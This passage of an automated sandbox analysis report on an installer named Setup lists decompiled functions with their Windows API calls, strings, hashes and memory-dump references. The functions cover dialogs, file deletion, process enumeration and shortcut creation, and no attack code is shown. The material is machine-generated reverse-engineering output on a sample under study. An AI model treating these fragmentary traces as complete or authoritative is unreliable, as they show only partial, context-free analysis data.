                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                        Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                        Strings
                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                        Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                        • String ID: F$A
                                                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                        Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                        Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                        Strings
                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                        Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                        Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                        Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                        Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
